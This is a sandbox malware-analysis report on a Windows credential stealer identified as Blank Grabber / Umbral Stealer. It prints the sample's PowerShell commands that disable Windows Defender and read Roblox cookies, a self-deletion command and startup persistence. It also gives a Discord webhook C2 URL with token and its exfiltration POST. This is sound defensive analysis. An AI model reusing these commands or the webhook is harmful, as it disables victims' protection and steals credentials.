Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
obvious.exe

Overview

General Information

Sample name:obvious.exe
Analysis ID:1500039
MD5:eabe2a81aa3dabab25e49ee4b36ce075
SHA1:f55b6298f0a8330d90d39e20a73adb2e828dfd1c
SHA256:5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
Tags:exe
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • obvious.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\obvious.exe" MD5: EABE2A81AA3DABAB25E49EE4B36CE075)
    • WMIC.exe (PID: 7632 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7728 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7772 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7920 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 8012 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8132 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7212 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7676 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7788 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3744 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7840 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5016 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3412 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5444 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX", "Version": "v1.3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
obvious.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    obvious.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      obvious.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  Process Memory Space: obvious.exe PID: 7532JoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                    Click to see the 3 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.obvious.exe.12f5f5a0000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.obvious.exe.12f5f5a0000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.obvious.exe.12f5f5a0000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 8012, ProcessName: powershell.exe
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe

                        Suricata Signatures

                        Timestamp:2024-08-27T20:06:02.729156+0200
                        SID:2045593
                        Severity:1
                        Source Port:49740
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-27T20:05:38.509069+0200
                        SID:2803305
                        Severity:3
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Unknown Traffic

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: obvious.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Found malware configuration
                        Source: obvious.exeMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX", "Version": "v1.3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrReversingLabs: Detection: 78%
                        Multi AV Scanner detection for submitted file
                        Source: obvious.exeReversingLabs: Detection: 78%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: obvious.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC9378C CryptUnprotectData,0_2_00007FFD9BC9378C
                        Source: obvious.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: obvious.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.4:49740 -> 162.159.136.232:443
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 208.95.112.1:80
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 939Expect: 100-continueConnection: Keep-Alive
                        Source: powershell.exe, 00000005.00000002.1775176597.000001E0C1DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F616BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F615E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: obvious.exe, uGCIY.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: obvious.exe, uGCIY.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BE9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=
                        Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                        Source: uGCIY.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ
                        Source: obvious.exe, uGCIY.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
